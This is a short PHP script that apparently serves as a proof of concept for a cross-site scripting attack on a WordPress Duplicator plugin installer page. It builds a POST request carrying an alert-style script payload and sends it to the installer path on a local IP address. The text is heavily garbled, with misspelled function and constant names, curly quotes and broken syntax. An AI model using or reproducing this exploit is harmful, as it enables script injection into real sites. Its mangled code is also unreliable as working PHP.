<?php
$data=array(
    ‘json=>`/`a/;};documento,write(alert(`IXSS”));MyViewModel

);
#create a connection
$url=’http://192.168.1.200/wptcontect/plugins/duplication/installer/build/view
     .Step.4.php’;
$ch=curl_init($url);
·form data string
$posting=http_bud_qery($data,”,”&”);

$Setting ouroptions
Curl_setop($ch,CURLOPT_POST,1);
Curl_setop($ch,CURLOPT_POSTFRIELDS,1);
Curl_setop($ch,CURLOPT_RETURNRANSFER,1true);

#Get the response
$response=curl_exec($ch);
Curl_close($ch);
Print_r($response);
}>












